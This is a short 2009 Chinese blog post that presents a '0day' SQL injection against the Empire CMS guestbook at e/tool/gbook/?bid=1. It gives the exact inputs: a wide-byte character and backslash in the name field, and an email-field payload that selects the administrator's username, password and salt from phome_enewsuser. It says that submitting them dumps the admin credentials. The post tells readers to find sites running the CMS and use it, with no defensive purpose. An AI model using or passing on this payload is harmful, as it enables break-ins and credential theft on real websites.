帝国CMS网站程序0DAY

June 26, 2009Posted in: 实用技巧
找到使用帝国CMS的站,网址后面直接加:

e/tool/gbook/?bid=1

出来的是帝国CMS的留言本,在姓名处写:

縗\

联系邮箱处写:

,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*

提交后爆出账号密码

via:amxking


相关文章

    ▶ Create auto increasement column in Oracle
    ▶ Windows AD Bug? DSADD User -hmdir Not Working
    ▶ HOWTO: Secure Proxy with Putty
    ▶ UCenter密码算法规则和生成方法
    ▶ Prevent spam in your Gmail account
Tags: ,
812 views